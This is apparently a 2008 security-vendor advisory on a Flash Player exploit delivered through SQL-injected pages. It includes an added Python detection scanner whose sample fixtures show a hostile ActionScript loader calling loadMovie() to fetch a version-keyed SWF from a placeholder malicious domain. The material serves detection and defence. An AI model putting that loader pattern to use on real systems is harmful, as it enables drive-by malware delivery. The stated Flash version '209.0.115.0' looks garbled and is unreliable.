Vulnerability in Flash Player actively exploited
May 28th, 2008
A vulnerability in Adobe’s Flash Player is actively being exploited in the wild, and it may be a zero-day vulnerability. Users who visit websites hosting specially crafted Flash movies and fall victim to a successful attack are infected with various trojan horses, with no user interaction required. One of the trojans, which disguises itself as a cascading stylesheet with the extension “.css”, is hosted on a Chinese server.
The initial infection vector appears to be the ongoing mass SQL injection attacks. Several domains known to host exploits used in the latest wave of SQL injection attacks now additionally point to this new Flash exploit. The exploit lets the attackers extend their existing arsenal and reach an even broader set of victims. A search query shows at least 240,000 legitimate pages already infected and redirecting to particular SQL injection domains, and apart from those that exist at this moment, new ones pop up all the time.

The malicious Flash movies are crafted to target Internet Explorer as well as Firefox users on the Windows platform. The following screenshot shows different file names for the OBJECT (Internet Explorer) and the EMBED element (Firefox) in the HTML source code.

We spotted several different variants of these specially crafted Flash movies hosted on different domains and carrying different payload URLs. The exploit code is referenced by another movie whose decompiled ActionScript simply fingerprints the installed Flash version in order to craft a URL pointing to the Flash exploit: “http://www.malicious_domain.cn/” + <Flash Version Number> + “name.swf”, which is then loaded via the ActionScript method loadMovie().
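The two indicators described above (an OBJECT/EMBED pair that serves different SWF files to Internet Explorer and Firefox, and a loader whose decompiled ActionScript builds a loadMovie() URL from the player version) can be checked for with a small scanner. The following is an added detection example, not code from the original post; the HTML and ActionScript inputs are constructed samples with placeholder domains, and the version-lookup names (getVersion(), $version) are assumed from ActionScript 2 rather than taken from the samples we analysed.

```python
import re

# Constructed sample of HTML injected into a compromised page (placeholder domain, not a real IoC).
SAMPLE_HTML = """<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1">
  <param name="movie" value="http://malicious_domain.example/ie.swf">
  <embed src="http://malicious_domain.example/ff.swf" width="1" height="1"></embed>
</object>"""

# Constructed decompiled ActionScript modelled on the loader movie described in the post.
SAMPLE_AS = """var ver = getVersion();
var num = ver.split(" ")[1].split(",").join(".");
loadMovie("http://malicious_domain.example/" + num + "name.swf", _root);
"""


def extract_swf_references(html):
    """Return (tag, url) pairs for OBJECT movie params and EMBED src attributes that point at .swf files."""
    refs = []
    for m in re.finditer(r'<param[^>]*name="movie"[^>]*value="([^"]+\.swf)"', html, re.I):
        refs.append(("object", m.group(1)))
    for m in re.finditer(r'<embed[^>]*src="([^"]+\.swf)"', html, re.I):
        refs.append(("embed", m.group(1)))
    return refs


def split_browser_payloads(html):
    """True when OBJECT (IE) and EMBED (Firefox) load different SWF files: the browser-specific split seen here."""
    urls = dict(extract_swf_references(html))
    return len(urls) == 2 and urls["object"] != urls["embed"]


def version_keyed_loader(actionscript):
    """True when the script reads the player version and concatenates a string into a loadMovie() target.

    Heuristic only: legitimate movies rarely build the loaded URL from the installed version number.
    """
    reads_version = re.search(r'\bgetVersion\s*\(\s*\)|\$version\b', actionscript) is not None
    builds_url = re.search(r'loadMovie\s*\(\s*"[^"]*"\s*\+', actionscript) is not None
    return reads_version and builds_url


if __name__ == "__main__":
    print("browser-split payload:", split_browser_payloads(SAMPLE_HTML))
    print("version-keyed loader:", version_keyed_loader(SAMPLE_AS))
```

Either flag on its own is only a heuristic; a page that trips both, and whose SWF references point off-site, is worth pulling the referenced movies for analysis.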

According to our current findings, valid exploit code is delivered for just one particular version of Adobe Flash Player, namely the Win32 release version 209.0.115.0; newer versions are pointed to a non-existent URL (404 error). The most up-to-date version of the Flash Player is reported not to be affected by the vulnerability. Adobe’s Product Security Incident Response Team (PSIRT) has published a blog post stating that the issue is currently being investigated. According to Adobe, it is currently unclear whether this is a new and unpatched vulnerability (a “zero-day exploit”) or new exploit code for a known and patched vulnerability.

In today’s Web 2.0 world, updating the operating system is no longer enough to be protected from attacks. With stronger security policies and fewer critical vulnerabilities appearing in operating systems, widespread third-party software such as Adobe Flash has become the new focus of attackers.
The known exploit Flash movies are detected and blocked as Exploit.SWF.MalScene by the Secure Anti-Malware Engine.
Author: Anti-Malware Team